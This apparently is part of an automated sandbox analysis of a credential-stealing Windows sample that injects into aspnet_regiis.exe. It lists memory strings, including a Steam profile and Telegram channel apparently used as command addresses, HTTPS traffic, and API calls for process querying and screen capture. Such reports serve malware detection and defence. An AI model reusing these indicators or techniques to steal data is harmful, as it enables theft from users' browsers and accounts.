                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                          Source: file.exe, 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
                          Source: file.exe, 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/workshop/
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/about/
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/explore/
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/legal/
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/mobile
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/news/
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/points/shop/
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/stats/
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                          Source: aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                          Source: EBAFBG.3.drString found in binary or memory: https://support.mozilla.org
                          Source: EBAFBG.3.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: EBAFBG.3.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                          Source: file.exe, 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5ed
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F80000.00000004.00000020.00020000.00000000.sdmp, ECBGCB.3.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                          Source: aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552045952.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://www.digicert.com/CPS0
                          Source: aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                          Source: aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                          Source: EBAFBG.3.drString found in binary or memory: https://www.mozilla.org
                          Source: EBAFBG.3.drString found in binary or memory: https://www.mozilla.org#
                          Source: aspnet_regiis.exe, 00000003.00000002.3378636469.000000001BA7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: EBAFBG.3.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                          Source: aspnet_regiis.exe, 00000003.00000002.3378636469.000000001BA7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                          Source: EBAFBG.3.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                          Source: EBAFBG.3.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F80000.00000004.00000020.00020000.00000000.sdmp, ECBGCB.3.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                          Source: aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                          Source: aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49721 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:49722 version: TLS 1.2
                          Source: unknown HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:49729 version: TLS 1.2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 3_2_00411F55

                          System Summary

                          Source: file.exe Static PE information: section name: n@G>6P
                          Source: file.exe Static PE information: section name:
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6E7F9610 GetModuleHandleW,NtQueryInformationProcess, 0_2_6E7F9610
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_0040145B GetCurrentProcess,NtQueryInformationProcess, 3_2_0040145B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6C7FB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 3_2_6C7FB700
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6C7FB8C0 rand_s,NtQueryVirtualMemory, 3_2_6C7FB8C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6C7FB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 3_2_6C7FB910
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6C79F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 3_2_6C79F280
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042CD2E3_2_0042CD2E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041B7123_2_0041B712
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7935A03_2_6C7935A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7A54403_2_6C7A5440
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D5C103_2_6C7D5C10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7E2C103_2_6C7E2C10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C80AC003_2_6C80AC00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D6CF03_2_6C7D6CF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C79D4E03_2_6C79D4E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7BD4D03_2_6C7BD4D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C80542B3_2_6C80542B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7A64C03_2_6C7A64C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C80545C3_2_6C80545C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7F34A03_2_6C7F34A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7FC4A03_2_6C7FC4A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7A6C803_2_6C7A6C80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7BED103_2_6C7BED10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7C05123_2_6C7C0512
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7AFD003_2_6C7AFD00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7F85F03_2_6C7F85F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7D0DD03_2_6C7D0DD0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C79C6703_2_6C79C670
